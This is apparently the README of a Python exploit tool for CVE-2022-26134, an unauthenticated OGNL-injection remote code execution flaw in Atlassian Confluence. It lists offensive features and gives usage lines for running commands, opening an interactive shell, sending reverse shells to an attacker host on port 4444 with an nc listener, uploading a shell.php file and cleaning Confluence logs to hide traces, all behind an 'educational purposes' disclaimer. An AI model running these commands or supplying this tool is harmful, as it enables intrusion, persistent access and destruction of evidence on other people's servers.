✅ For educational purposes only. Do not use against systems you don't have explicit permission to test.
This is a full-featured Python exploit for the critical Unauthenticated Remote Code Execution (RCE) vulnerability in Atlassian Confluence, identified as CVE-2022-26134.
It leverages an OGNL injection vulnerability to execute arbitrary system commands, establish reverse shells, upload files, clean logs, and more.
✅ Command Execution (OGNL RCE)
✅ Interactive pseudo-shell
✅ Reverse Shell (bash / python / mkfifo)
✅ Auto-detect open outbound ports for reverse shell
✅ File Upload (via base64 encoding)
✅ Log Cleaning
✅ Logging to
exploit_log.txt
- Confluence Server 7.3.5
- Python 3.x
- No authentication required
python3 exploit.py <TARGET_URL> [OPTIONS]| Option | Description |
|---|---|
--cmd '<command>' |
Run a single command |
--shell |
Start interactive RCE shell |
--reverse <LHOST> <LPORT> [method] |
Send reverse shell (method: bash / python / mkfifo) |
--autors <LHOST> |
Auto-detect open port and send reverse shell |
--upload <local_file> <remote_path> |
Upload a file via base64 |
--cleanlogs |
Attempt to clean Confluence logs (basic) |
python3 exploit.py http://10.201.92.3:8090 --cmd 'id'python3 exploit.py http://10.201.92.3:8090 --shellnc -lvnp 4444
python3 exploit.py http://10.201.92.3:8090 --reverse 10.10.14.99 4444 bashpython3 exploit.py http://10.201.92.3:8090 --autors 10.10.14.99python3 exploit.py http://10.201.92.3:8090 --upload shell.php /tmp/shell.phppython3 exploit.py http://10.201.92.3:8090 --cleanlogsAll executed commands and their results are automatically saved to:
exploit_log.txt
This tool is provided strictly for educational and authorized testing purposes.
- Do not use against systems without explicit permission.
- The author is not responsible for any misuse or damage.